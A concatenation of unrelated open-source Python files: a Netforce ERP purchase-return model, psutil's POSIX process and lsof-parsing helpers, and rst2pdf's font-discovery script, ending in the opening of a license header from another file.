# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields, get_model
from netforce.utils import get_data_path
import time
from netforce.access import get_active_company, get_active_user, set_active_user
from . import utils
from decimal import Decimal
class PurchaseReturn(Model):
_name = "purchase.return"
_string = "Purchase Return"
_audit_log = True
_name_field = "number"
_multi_company = True
_key = ["company_id", "number"]
_fields = {
"number": fields.Char("Number", required=True, search=True),
"ref": fields.Char("Ref", search=True),
"contact_id": fields.Many2One("contact", "Supplier", required=True, search=True),
"date": fields.Date("Date", required=True, search=True),
"state": fields.Selection([("draft", "Draft"), ("confirmed", "Confirmed"), ("done", "Completed"), ("voided", "Voided")], "Status", required=True),
"lines": fields.One2Many("purchase.return.line", "order_id", "Lines"),
"amount_subtotal": fields.Decimal("Subtotal", function="get_amount", function_multi=True, store=True),
"amount_tax": fields.Decimal("Tax Amount", function="get_amount", function_multi=True, store=True),
"amount_total": fields.Decimal("Total", function="get_amount", function_multi=True, store=True),
"amount_total_cur": fields.Decimal("Total", function="get_amount", function_multi=True, store=True),
"amount_total_words": fields.Char("Total Words", function="get_amount_total_words"),
"currency_id": fields.Many2One("currency", "Currency", required=True),
"tax_type": fields.Selection([["tax_ex", "Tax Exclusive"], ["tax_in", "Tax Inclusive"], ["no_tax", "No Tax"]], "Tax Type", required=True),
"invoices": fields.One2Many("account.invoice", "related_id", "Credit Notes"),
"pickings": fields.Many2Many("stock.picking", "Stock Pickings", function="get_pickings"),
"is_delivered": fields.Boolean("Delivered", function="get_delivered"),
"is_paid": fields.Boolean("Paid", function="get_paid"),
"comments": fields.One2Many("message", "related_id", "Comments"),
"payment_terms": fields.Text("Payment Terms"),
"ship_term_id": fields.Many2One("ship.term", "Shipping Terms"),
"price_list_id": fields.Many2One("price.list", "Price List", condition=[["type", "=", "purchase"]]),
"documents": fields.One2Many("document", "related_id", "Documents"),
"company_id": fields.Many2One("company", "Company"),
"other_info": fields.Text("Other Info"),
"bill_address_id": fields.Many2One("address", "Billing Address"),
"ship_address_id": fields.Many2One("address", "Shipping Address"),
"sequence_id": fields.Many2One("sequence", "Number Sequence"),
"stock_moves": fields.One2Many("stock.move", "related_id", "Stock Movements"),
"agg_amount_total": fields.Decimal("Total Amount", agg_function=["sum", "amount_total"]),
"year": fields.Char("Year", sql_function=["year", "date"]),
"quarter": fields.Char("Quarter", sql_function=["quarter", "date"]),
"month": fields.Char("Month", sql_function=["month", "date"]),
"week": fields.Char("Week", sql_function=["week", "date"]),
"agg_amount_subtotal": fields.Decimal("Total Amount w/o Tax", agg_function=["sum", "amount_subtotal"]),
"user_id": fields.Many2One("base.user", "Owner", search=True),
"emails": fields.One2Many("email.message", "related_id", "Emails"),
"orig_purchase_id": fields.Many2One("purchase.order","Original Purchase Order"),
}
_order = "date desc,number desc"
def _get_number(self, context={}):
seq_id = get_model("sequence").find_sequence(type="purchase_return")
if not seq_id:
return None
while 1:
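            # Draw numbers from the sequence until an unused one is found;
            # the uniqueness check runs as user 1 (presumably the superuser)
            # so records hidden by access rules are not missed.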
num = get_model("sequence").get_next_number(seq_id)
user_id = get_active_user()
set_active_user(1)
res = self.search([["number", "=", num]])
set_active_user(user_id)
if not res:
return num
get_model("sequence").increment_number(seq_id)
def _get_currency(self, context={}):
settings = get_model("settings").browse(1)
return settings.currency_id.id
_defaults = {
"state": "draft",
"date": lambda *a: time.strftime("%Y-%m-%d"),
"number": _get_number,
"currency_id": _get_currency,
"tax_type": "tax_ex",
"company_id": lambda *a: get_active_company(),
"user_id": lambda *a: get_active_user(),
}
def create(self, vals, **kw):
id = super(PurchaseReturn, self).create(vals, **kw)
self.function_store([id])
return id
def write(self, ids, vals, **kw):
super(PurchaseReturn, self).write(ids, vals, **kw)
self.function_store(ids)
def confirm(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "draft":
raise Exception("Invalid state")
for line in obj.lines:
prod = line.product_id
if prod and prod.type in ("stock", "consumable", "bundle") and not line.location_id:
raise Exception("Missing location for product %s" % prod.code)
obj.write({"state": "confirmed"})
obj.trigger("confirm")
def done(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "confirmed":
raise Exception("Invalid state")
obj.write({"state": "done"})
def reopen(self, ids, context={}):
for obj in self.browse(ids):
if obj.state != "done":
raise Exception("Invalid state")
obj.write({"state": "confirmed"})
def to_draft(self, ids, context={}):
for obj in self.browse(ids):
obj.write({"state": "draft"})
def get_amount(self, ids, context={}):
settings = get_model("settings").browse(1)
res = {}
for obj in self.browse(ids):
vals = {}
subtotal = 0
tax = 0
for line in obj.lines:
if line.tax_id:
line_tax = get_model("account.tax.rate").compute_tax(
line.tax_id.id, line.amount, tax_type=obj.tax_type)
else:
line_tax = 0
tax += line_tax
if obj.tax_type == "tax_in":
subtotal += line.amount - line_tax
else:
subtotal += line.amount
vals["amount_subtotal"] = subtotal
vals["amount_tax"] = tax
vals["amount_total"] = subtotal + tax
vals["amount_total_cur"] = get_model("currency").convert(
vals["amount_total"], obj.currency_id.id, settings.currency_id.id)
res[obj.id] = vals
return res
def get_qty_total(self, ids, context={}):
res = {}
for obj in self.browse(ids):
qty = sum([line.qty for line in obj.lines])
res[obj.id] = qty or 0
return res
def update_amounts(self, context):
data = context["data"]
data["amount_subtotal"] = 0
data["amount_tax"] = 0
tax_type = data["tax_type"]
for line in data["lines"]:
if not line:
continue
amt = Decimal(((line.get("qty") or 0) * (line.get("unit_price") or 0)) - (line.get("discount_amount") or 0))
line["amount"] = amt
tax_id = line.get("tax_id")
if tax_id:
tax = get_model("account.tax.rate").compute_tax(tax_id, amt, tax_type=tax_type)
data["amount_tax"] += tax
else:
tax = 0
if tax_type == "tax_in":
data["amount_subtotal"] += amt - tax
else:
data["amount_subtotal"] += amt
data["amount_total"] = data["amount_subtotal"] + data["amount_tax"]
return data
def onchange_product(self, context):
data = context["data"]
path = context["path"]
line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
line["description"] = prod.description
line["qty"] = 1
if prod.uom_id is not None:
line["uom_id"] = prod.uom_id.id
pricelist_id = data["price_list_id"]
price = None
if pricelist_id:
price = get_model("price.list").get_price(pricelist_id, prod.id, 1)
price_list = get_model("price.list").browse(pricelist_id)
price_currency_id = price_list.currency_id.id
if price is None:
price = prod.purchase_price
settings = get_model("settings").browse(1)
price_currency_id = settings.currency_id.id
if price is not None:
currency_id = data["currency_id"]
price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
line["unit_price"] = price_cur
if prod.purchase_tax_id is not None:
line["tax_id"] = prod.purchase_tax_id.id
if prod.location_id:
line["location_id"] = prod.location_id.id
data = self.update_amounts(context)
return data
def onchange_qty(self, context):
data = context["data"]
path = context["path"]
line = get_data_path(data, path, parent=True)
prod_id = line.get("product_id")
if not prod_id:
return {}
prod = get_model("product").browse(prod_id)
pricelist_id = data["price_list_id"]
qty = line["qty"]
price = None
if pricelist_id:
price = get_model("price.list").get_price(pricelist_id, prod.id, qty)
price_list = get_model("price.list").browse(pricelist_id)
price_currency_id = price_list.currency_id.id
if price is None:
price = prod.purchase_price
settings = get_model("settings").browse(1)
price_currency_id = settings.currency_id.id
if price is not None:
currency_id = data["currency_id"]
price_cur = get_model("currency").convert(price, price_currency_id, currency_id)
line["unit_price"] = price_cur
data = self.update_amounts(context)
return data
def copy_to_picking(self, ids, context):
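        # Build an outgoing picking (goods issue) covering the quantities
        # that have not yet been shipped back to the supplier.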
id = ids[0]
obj = self.browse(id)
contact = obj.contact_id
pick_vals = {
"type": "out",
"ref": obj.number,
"related_id": "purchase.return,%s" % obj.id,
"contact_id": contact.id,
"currency_id": obj.currency_id.id,
"lines": [],
}
if contact and contact.pick_in_journal_id:
pick_vals["journal_id"] = contact.pick_in_journal_id.id
res = get_model("stock.location").search([["type", "=", "supplier"]],order="id")
if not res:
raise Exception("Supplier location not found")
supp_loc_id = res[0]
res = get_model("stock.location").search([["type", "=", "internal"]])
if not res:
raise Exception("Warehouse not found")
wh_loc_id = res[0]
for line in obj.lines:
prod = line.product_id
if prod.type not in ("stock", "consumable"):
continue
remain_qty = line.qty - line.qty_issued
if remain_qty <= 0:
continue
line_vals = {
"product_id": prod.id,
"qty": remain_qty,
"uom_id": line.uom_id.id,
"base_price": line.unit_price,
"location_from_id": line.location_id.id or wh_loc_id,
"location_to_id": supp_loc_id,
"related_id": "purchase.return,%s" % obj.id,
}
pick_vals["lines"].append(("create", line_vals))
if not pick_vals["lines"]:
raise Exception("Nothing left to receive")
pick_id = get_model("stock.picking").create(pick_vals, {"pick_type": "out"})
pick = get_model("stock.picking").browse(pick_id)
return {
"next": {
"name": "pick_out",
"mode": "form",
"active_id": pick_id,
},
"flash": "Goods issue %s created from purchase return %s" % (pick.number, obj.number),
}
def copy_to_credit_note(self, ids, context={}):
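        # Build a supplier credit note covering the quantities that have
        # not been credited yet (qty minus qty_invoiced).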
id = ids[0]
obj = self.browse(id)
contact = obj.contact_id
inv_vals = {
"type": "in",
"inv_type": "credit",
"ref": obj.number,
"related_id": "purchase.return,%s" % obj.id,
"contact_id": obj.contact_id.id,
"currency_id": obj.currency_id.id,
"lines": [],
"tax_type": obj.tax_type,
}
if contact.purchase_journal_id:
inv_vals["journal_id"] = contact.purchase_journal_id.id
if contact.purchase_journal_id.sequence_id:
inv_vals["sequence_id"] = contact.purchase_journal_id.sequence_id.id
for line in obj.lines:
prod = line.product_id
remain_qty = line.qty - line.qty_invoiced
if remain_qty <= 0:
continue
line_vals = {
"product_id": prod.id,
"description": line.description,
"qty": remain_qty,
"uom_id": line.uom_id.id,
"unit_price": line.unit_price,
"account_id": prod and prod.purchase_account_id.id or None,
"tax_id": line.tax_id.id,
"amount": line.amount,
}
inv_vals["lines"].append(("create", line_vals))
if not inv_vals["lines"]:
raise Exception("Nothing left to invoice")
inv_id = get_model("account.invoice").create(inv_vals, {"type": "in", "inv_type": "invoice"})
inv = get_model("account.invoice").browse(inv_id)
return {
"next": {
"name": "view_invoice",
"active_id": inv_id,
},
"flash": "Credit note %s created from purchase return %s" % (inv.number, obj.number),
}
def get_delivered(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
is_delivered = True
for line in obj.lines:
prod = line.product_id
if prod.type not in ("stock", "consumable"):
continue
remain_qty = line.qty - line.qty_issued
if remain_qty > 0:
is_delivered = False
break
vals[obj.id] = is_delivered
return vals
def get_paid(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
amt_paid = 0
for inv in obj.invoices:
if inv.state != "paid":
continue
amt_paid += inv.amount_total
is_paid = amt_paid >= obj.amount_total
vals[obj.id] = is_paid
return vals
def void(self, ids, context={}):
obj = self.browse(ids)[0]
for pick in obj.pickings:
if pick.state != "voided":
raise Exception("There are still goods receipts for this purchase order")
for inv in obj.invoices:
if inv.state != "voided":
raise Exception("There are still invoices for this purchase order")
obj.write({"state": "voided"})
def get_invoices(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
inv_ids = []
for inv_line in obj.invoice_lines:
inv_id = inv_line.invoice_id.id
if inv_id not in inv_ids:
inv_ids.append(inv_id)
vals[obj.id] = inv_ids
return vals
def get_pickings(self, ids, context={}):
vals = {}
for obj in self.browse(ids):
pick_ids = []
for move in obj.stock_moves:
pick_id = move.picking_id.id
if pick_id not in pick_ids:
pick_ids.append(pick_id)
vals[obj.id] = pick_ids
return vals
def onchange_contact(self, context):
data = context["data"]
contact_id = data.get("contact_id")
if not contact_id:
return {}
contact = get_model("contact").browse(contact_id)
data["payment_terms"] = contact.payment_terms
data["price_list_id"] = contact.purchase_price_list_id.id
return data
def onchange_sequence(self, context={}):
data = context["data"]
seq_id = data["sequence_id"]
if not seq_id:
return None
while 1:
num = get_model("sequence").get_next_number(seq_id, context=context)
res = self.search([["number", "=", num]])
if not res:
break
get_model("sequence").increment_number(seq_id, context=context)
data["number"] = num
return data
def delete(self, ids, **kw):
for obj in self.browse(ids):
if obj.state in ("confirmed", "done"):
raise Exception("Can not delete purchase return in this status")
super().delete(ids, **kw)
PurchaseReturn.register()
|
|
#!/usr/bin/env python
#
# $Id: _psposix.py 1342 2012-06-10 22:43:25Z g.rodola $
#
# Copyright (c) 2009, Jay Loden, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Routines common to all posix systems."""
import os
import errno
import subprocess
import psutil
import socket
import re
import sys
import warnings
import time
import glob
from psutil.error import AccessDenied, NoSuchProcess, TimeoutExpired
from psutil._compat import PY3, namedtuple
from psutil._common import nt_diskinfo, usage_percent
def pid_exists(pid):
"""Check whether pid exists in the current process table."""
if not isinstance(pid, int):
raise TypeError('an integer is required')
if pid < 0:
return False
try:
os.kill(pid, 0)
except OSError:
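        # ESRCH would mean the pid is gone; EPERM means the process exists
        # but we lack permission to signal it, which still proves existence.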
e = sys.exc_info()[1]
return e.errno == errno.EPERM
else:
return True
def wait_pid(pid, timeout=None):
"""Wait for process with pid 'pid' to terminate and return its
exit status code as an integer.
If pid is not a children of os.getpid() (current process) just
waits until the process disappears and return None.
If pid does not exist at all return None immediately.
Raise TimeoutExpired on timeout expired.
"""
def check_timeout(delay):
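        # Sleep between waitpid() polls, doubling the delay up to a 40 ms cap
        # so that short-lived processes are reaped promptly.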
if timeout is not None:
if time.time() >= stop_at:
raise TimeoutExpired(pid)
time.sleep(delay)
return min(delay * 2, 0.04)
if timeout is not None:
waitcall = lambda: os.waitpid(pid, os.WNOHANG)
stop_at = time.time() + timeout
else:
waitcall = lambda: os.waitpid(pid, 0)
delay = 0.0001
while 1:
try:
retpid, status = waitcall()
except OSError:
err = sys.exc_info()[1]
if err.errno == errno.EINTR:
delay = check_timeout(delay)
continue
elif err.errno == errno.ECHILD:
# This has two meanings:
# - pid is not a child of os.getpid() in which case
# we keep polling until it's gone
# - pid never existed in the first place
# In both cases we'll eventually return None as we
# can't determine its exit status code.
while 1:
if pid_exists(pid):
delay = check_timeout(delay)
else:
return
else:
raise
else:
if retpid == 0:
# WNOHANG was used, pid is still running
delay = check_timeout(delay)
continue
# process exited due to a signal; return the integer of
# that signal
if os.WIFSIGNALED(status):
return os.WTERMSIG(status)
# process exited using exit(2) system call; return the
# integer exit(2) system call has been called with
elif os.WIFEXITED(status):
return os.WEXITSTATUS(status)
else:
# should never happen
raise RuntimeError("unknown process exit status")
def get_disk_usage(path):
"""Return disk usage associated with path."""
st = os.statvfs(path)
free = (st.f_bavail * st.f_frsize)
total = (st.f_blocks * st.f_frsize)
used = (st.f_blocks - st.f_bfree) * st.f_frsize
percent = usage_percent(used, total, _round=1)
    # NB: the percentage is about 5% lower than what df shows, due to
    # reserved blocks that we are currently not considering:
    # http://goo.gl/sWGbH
return nt_diskinfo(total, used, free, percent)
def _get_terminal_map():
ret = {}
ls = glob.glob('/dev/tty*') + glob.glob('/dev/pts/*')
for name in ls:
assert name not in ret
ret[os.stat(name).st_rdev] = name
return ret
class LsofParser:
"""A wrapper for lsof command line utility.
Executes lsof in subprocess and parses its output.
"""
socket_table = {'TCP' : socket.SOCK_STREAM,
'UDP' : socket.SOCK_DGRAM,
'IPv4' : socket.AF_INET,
'IPv6' : socket.AF_INET6}
_openfile_ntuple = namedtuple('openfile', 'path fd')
_connection_ntuple = namedtuple('connection', 'fd family type local_address '
'remote_address status')
def __init__(self, pid, name):
self.pid = pid
self.process_name = name
# XXX - this is no longer used
def get_process_open_files(self):
"""Return files opened by process by parsing lsof output."""
# Options:
# -i == network files only
# -a == ANDing of all options
# -p == process with given PID only
# -n == do not resolve IP addresses
# -P == do not resolve port numbers
# -w == suppresses warnings
        # -F0ftn == (0) separate lines with "\x00"
# (n) file name
# (t) file type
        #           (f) file descriptor
cmd = "lsof -a -p %s -n -P -F0ftn" % self.pid
stdout = self.runcmd(cmd)
if not stdout:
return []
files = []
lines = stdout.split("\n")
del lines[0] # first line contains the PID
for line in lines:
if not line:
continue
line = line.strip("\x00")
fields = {}
for field in line.split("\x00"):
key, value = field[0], field[1:]
fields[key] = value
            if 't' not in fields:
continue
_type = fields['t']
fd = fields['f']
name = fields['n']
if 'REG' in _type and fd.isdigit():
if not os.path.isfile(os.path.realpath(name)):
continue
ntuple = self._openfile_ntuple(name, int(fd))
files.append(ntuple)
return files
def get_process_connections(self):
"""Return connections opened by a process by parsing lsof output."""
# Options:
# -i == network files only
# -a == ANDing of all options
# -p == process with given PID only
# -n == do not resolve IP addresses
# -P == do not resolve port numbers
# -w == suppresses warnings
        # -F0nPtTf == (0) separate lines with "\x00"
# (n) and show internet addresses only
        #            (P) protocol type (TCP, UDP, Unix)
# (t) socket family (IPv4, IPv6)
# (T) connection status
# (f) file descriptors
cmd = "lsof -p %s -i -a -F0nPtTf -n -P" % self.pid
stdout = self.runcmd(cmd)
if not stdout:
return []
connections = []
lines = stdout.split()
del lines[0] # first line contains the PID
for line in lines:
line = line.strip("\x00")
fields = {}
for field in line.split("\x00"):
if field.startswith('T'):
key, value = field.split('=')
else:
key, value = field[0], field[1:]
fields[key] = value
            # XXX - might throw an exception; needs "continue on unsupported
            # family or type" (e.g. unix sockets)
# we consider TCP and UDP sockets only
stype = fields['P']
if stype not in self.socket_table:
continue
else:
_type = self.socket_table[fields['P']]
family = self.socket_table[fields['t']]
peers = fields['n']
fd = int(fields['f'])
if _type == socket.SOCK_STREAM:
status = fields['TST']
# OS X shows "CLOSED" instead of "CLOSE" so translate them
if status == "CLOSED":
status = "CLOSE"
else:
status = ""
            if '->' not in peers:
local_addr = self._normaddress(peers, family)
remote_addr = ()
# OS X processes e.g. SystemUIServer can return *:* for local
# address, so we return 0 and move on
if local_addr == 0:
continue
else:
local_addr, remote_addr = peers.split("->")
local_addr = self._normaddress(local_addr, family)
remote_addr = self._normaddress(remote_addr, family)
conn = self._connection_ntuple(fd, family, _type, local_addr,
remote_addr, status)
connections.append(conn)
return connections
def runcmd(self, cmd):
"""Expects an lsof-related command line, execute it in a
subprocess and return its output.
If something goes bad stderr is parsed and proper exceptions
raised as necessary.
"""
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
if PY3:
stdout, stderr = [x.decode(sys.stdout.encoding)
for x in (stdout, stderr)]
if stderr:
utility = cmd.split(' ')[0]
if self._which(utility) is None:
msg = "this functionnality requires %s command line utility " \
"to be installed on the system" % utility
raise NotImplementedError(msg)
elif "permission denied" in stderr.lower():
# "permission denied" can be found also in case of zombie
# processes;
p = psutil.Process(self.pid)
if not p.is_running():
raise NoSuchProcess(self.pid, self.process_name)
raise AccessDenied(self.pid, self.process_name)
elif "lsof: warning:" in stderr.lower():
# usually appears when lsof is run for the first time and
# complains about missing cache file in user home
warnings.warn(stderr, RuntimeWarning)
else:
# this must be considered an application bug
raise RuntimeError(stderr)
if not stdout:
p = psutil.Process(self.pid)
if not p.is_running():
raise NoSuchProcess(self.pid, self.process_name)
return ""
return stdout
@staticmethod
def _which(program):
"""Same as UNIX which command. Return None on command not found."""
def is_exe(fpath):
return os.path.isfile(fpath) and os.access(fpath, os.X_OK)
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
@staticmethod
def _normaddress(addr, family):
"""Normalize an IP address."""
assert family in (socket.AF_INET, socket.AF_INET6), "unsupported family"
if family == socket.AF_INET:
ip, port = addr.split(':')
else:
if "]" in addr:
                ip, port = re.findall(r'\[([^]]+)\]:([0-9]+)', addr)[0]
else:
ip, port = addr.split(':')
if ip == '*':
if family == socket.AF_INET:
ip = "0.0.0.0"
elif family == socket.AF_INET6:
ip = "::"
# OS X can have some procs e.g. SystemUIServer listening on *:*
else:
raise ValueError("invalid IP %s" %addr)
if port == "*":
return 0
return (ip, int(port))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# See LICENSE.txt for licensing terms
"""
Scan a list of folders and find all .afm and .ttf font files,
then create rst2pdf-ready font aliases.
"""
import os
import sys
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import (
TTFont,
TTFontFile,
TTFError,
FF_FORCEBOLD,
FF_ITALIC
)
from reportlab.lib.fonts import addMapping
from rst2pdf.log import log
flist = []
afmList = []
pfbList = {}
ttfList = []
# Aliases defined by GhostScript, so if you use Palatino or whatever you
# may get **something**. They are family name aliases.
Alias = {
'itc bookman': 'urw bookman l',
'itc avant garde gothic': 'urw gothic l',
'palatino': 'urw palladio l',
'new century schoolbook': 'century schoolbook l',
'itc zapf chancery': 'urw chancery l'
}
# Standard PDF fonts, so no need to embed them
Ignored = ['times', 'itc zapf dingbats', 'symbol', 'helvetica', 'courier']
fonts = {}
families = {}
fontMappings = {}
def loadFonts():
"""
Search the system and build lists of available fonts.
"""
if not afmList and not pfbList and not ttfList:
        # Find all ".afm", ".pfb" and ".ttf"/".ttc" font files
for root in flist:
for folder, _, names in os.walk(root):
for f in names:
ext = os.path.splitext(f)[-1]
if ext in ['.ttf', '.ttc']:
ttfList.append(os.path.join(folder, f))
if ext == '.afm':
afmList.append(os.path.join(folder, f))
if ext == '.pfb':
pfbList[f[:-4]] = os.path.join(folder, f)
for ttf in ttfList:
#Find out how to process these
try:
font = TTFontFile(ttf)
except TTFError:
continue
family = font.familyName.lower().decode()
fontName = font.name.decode()
baseName = os.path.basename(ttf)[:-4]
fullName = font.fullName.decode()
fonts[fontName.lower()] = (ttf, ttf, family)
fonts[fullName.lower()] = (ttf, ttf, family)
fonts[fullName.lower().replace('italic', 'oblique')] = (ttf, ttf, family)
bold = (FF_FORCEBOLD == FF_FORCEBOLD & font.flags)
italic = (FF_ITALIC == FF_ITALIC & font.flags)
# And we can try to build/fill the family mapping
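        # families[name] holds face names as [regular, bold, italic, bold-italic].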
if family not in families:
families[family] = [fontName, fontName, fontName, fontName]
if bold and italic:
families[family][3] = fontName
elif bold:
families[family][1] = fontName
elif italic:
families[family][2] = fontName
# FIXME: what happens if there are Demi and Medium
# weights? We get a random one.
else:
families[family][0] = fontName
# Now we have full afm and pbf lists, process the
# afm list to figure out family name, weight and if
# it's italic or not, as well as where the
# matching pfb file is
for afm in afmList:
family = None
fontName = None
italic = False
bold = False
for line in open(afm, 'r'):
line = line.strip()
if line.startswith('StartCharMetrics'):
break
elif line.startswith('FamilyName'):
family = ' '.join(line.split(' ')[1:]).lower()
elif line.startswith('FontName'):
fontName = line.split(' ')[1]
# TODO: find a way to alias the fullname to this font
# so you can use names like "Bitstream Charter Italic"
elif line.startswith('FullName'):
fullName = ' '.join(line.split(' ')[1:])
elif line.startswith('Weight'):
w = line.split(' ')[1]
if w == 'Bold':
bold = True
elif line.startswith('ItalicAngle'):
if line.split(' ')[1] != '0.0':
italic = True
baseName = os.path.basename(afm)[:-4]
if family in Ignored:
continue
if family in Alias:
continue
if baseName not in pfbList:
log.info("afm file without matching pfb file: %s" % baseName)
continue
# So now we have a font we know we can embed.
fonts[fontName.lower()] = (afm, pfbList[baseName], family)
fonts[fullName.lower()] = (afm, pfbList[baseName], family)
fonts[fullName.lower().replace('italic', 'oblique')] = \
(afm, pfbList[baseName], family)
# And we can try to build/fill the family mapping
if family not in families:
families[family] = [fontName, fontName, fontName, fontName]
if bold and italic:
families[family][3] = fontName
elif bold:
families[family][1] = fontName
elif italic:
families[family][2] = fontName
# FIXME: what happens if there are Demi and Medium
# weights? We get a random one.
else:
families[family][0] = fontName
def findFont(fname):
loadFonts()
# So now we are sure we know the families and font
# names. Well, return some data!
fname = fname.lower()
if fname in fonts:
font = fonts[fname.lower()]
else:
if fname in Alias:
fname = Alias[fname]
if fname in families:
font = fonts[families[fname][0].lower()]
else:
return None
return font
def findTTFont(fname):
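    # On POSIX systems the lookup is delegated to fontconfig's fc-match;
    # on Windows the font file is resolved through the registry instead.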
def get_family(query):
data = os.popen("fc-match \"%s\"" % query, "r").read()
for line in data.splitlines():
line = line.strip()
if not line:
continue
fname, family, _, variant = line.split('"')[:4]
family = family.replace('"', '')
if family:
return family
return None
def get_fname(query):
data = os.popen("fc-match -v \"%s\"" % query, "r").read()
for line in data.splitlines():
line = line.strip()
if line.startswith("file: "):
return line.split('"')[1]
return None
def get_variants(family):
variants = [
get_fname(family + ":style=Roman"),
get_fname(family + ":style=Bold"),
get_fname(family + ":style=Oblique"),
get_fname(family + ":style=Bold Oblique")]
if variants[2] == variants[0]:
variants[2] = get_fname(family + ":style=Italic")
if variants[3] == variants[0]:
variants[3] = get_fname(family + ":style=Bold Italic")
if variants[0].endswith('.pfb') or variants[0].endswith('.gz'):
return None
return variants
if os.name != 'nt':
family = get_family(fname)
if not family:
log.error("Unknown font: %s", fname)
return None
return get_variants(family)
else:
# lookup required font in registry lookup, alternative approach
# is to let loadFont() traverse windows font directory or use
# ctypes with EnumFontFamiliesEx
def get_nt_fname(ftname):
import winreg as _w
fontkey = _w.OpenKey(
_w.HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts"
)
fontname = ftname + " (TrueType)"
try:
fname = _w.QueryValueEx(fontkey, fontname)[0]
if os.path.isabs(fname):
                    fontkey.Close()
return fname
fontdir = os.environ.get("SystemRoot", "C:\\Windows")
fontdir += "\\Fonts"
fontkey.Close()
return fontdir + "\\" + fname
except WindowsError:
fontkey.Close()
return None
family, pos = guessFont(fname)
fontfile = get_nt_fname(fname)
if not fontfile:
if pos == 0:
fontfile = get_nt_fname(family)
elif pos == 1:
fontfile = get_nt_fname(family + " Bold")
elif pos == 2:
fontfile = get_nt_fname(family + " Italic") or \
get_nt_fname(family + " Oblique")
else:
fontfile = get_nt_fname(family + " Bold Italic") or \
get_nt_fname(family + " Bold Oblique")
if not fontfile:
log.error("Unknown font: %s", fname)
return None
family, pos = guessFont(fname)
variants = [
get_nt_fname(family) or fontfile,
get_nt_fname(family + " Bold") or fontfile,
get_nt_fname(family + " Italic") or
get_nt_fname(family + " Oblique") or fontfile,
get_nt_fname(family + " Bold Italic") or
get_nt_fname(family + " Bold Oblique") or fontfile,
]
return variants
def autoEmbed(fname):
"""
Given a font name, do a best-effort of embedding the font and its variants.
Return a list of the font names it registered with ReportLab.
"""
log.info('Trying to embed %s' % fname)
fontList = []
variants = []
font = findFont(fname)
if font: # We have this font located
if font[0].lower()[-4:] == '.afm': # Type 1 font
family = families[font[2]]
# Register the whole family of faces
faces = [pdfmetrics.EmbeddedType1Face(*fonts[fn.lower()][:2])
for fn in family]
for face in faces:
pdfmetrics.registerTypeFace(face)
for face, name in zip(faces, family):
fontList.append(name)
font = pdfmetrics.Font(face, name, "WinAnsiEncoding")
log.info('Registering font: %s from %s' % (face, name))
pdfmetrics.registerFont(font)
# Map the variants
            regular, bold, italic, bolditalic = family
addMapping(fname, 0, 0, regular)
addMapping(fname, 0, 1, italic)
addMapping(fname, 1, 0, bold)
addMapping(fname, 1, 1, bolditalic)
addMapping(regular, 0, 0, regular)
addMapping(regular, 0, 1, italic)
addMapping(regular, 1, 0, bold)
addMapping(regular, 1, 1, bolditalic)
log.info('Embedding as %s' % fontList)
return fontList
else: # A TTF font
variants = [fonts[f.lower()][0] for f in families[font[2]]]
if not variants: # Try fc-match
variants = findTTFont(fname)
# It is a TT Font and we found it using fc-match (or found *something*)
if variants:
for variant in variants:
vname = os.path.basename(variant)[:-4]
try:
if vname not in pdfmetrics._fonts:
_font = TTFont(vname, variant)
log.info('Registering font: %s from %s' % (vname, variant))
pdfmetrics.registerFont(_font)
except TTFError:
log.error('Error registering font: %s from %s' % (vname, variant))
else:
fontList.append(vname)
regular, bold, italic, bolditalic = [
os.path.basename(variant)[:-4] for variant in variants]
addMapping(regular, 0, 0, regular)
addMapping(regular, 0, 1, italic)
addMapping(regular, 1, 0, bold)
addMapping(regular, 1, 1, bolditalic)
log.info('Embedding via findTTFont as %s' % fontList)
return fontList
def guessFont(fname):
"""
Guess what a font name means.
Font names may be, for example, "Tahoma-BoldOblique", "Bitstream Charter
Italic" or "Perpetua Bold Italic".
    Returns (family, x) where x is
0: regular
1: bold
2: italic
3: bolditalic
"""
italic = 0
bold = 0
if '-' not in fname:
sfx = {
"Bold": 1,
"Bold Italic": 3,
"Bold Oblique": 3,
"Italic": 2,
"Oblique": 2
}
for key in sfx:
if fname.endswith(" " + key):
                return fname.rpartition(" " + key)[0], sfx[key]
return fname, 0
else:
family, mod = fname.rsplit('-', 1)
mod = mod.lower()
if "oblique" in mod or "italic" in mod:
italic = 1
if "bold" in mod:
bold = 1
if bold + italic == 0: # Not really a modifier
return fname, 0
return family, bold + 2 * italic
def main():
global flist
if len(sys.argv) != 2:
print("Usage: findfont fontName")
sys.exit(1)
if os.name == 'nt':
flist = [".", os.environ.get("SystemRoot", "C:\\Windows") + "\\Fonts"]
else:
flist = [".", "/usr/share/fonts", "/usr/share/texmf-dist/fonts"]
fn, pos = guessFont(sys.argv[1])
f = findFont(fn)
if not f:
f = findTTFont(fn)
if f:
print(f)
else:
print("Unknown font %s" % sys.argv[1])
if __name__ == "__main__":
main()
|
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2018 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
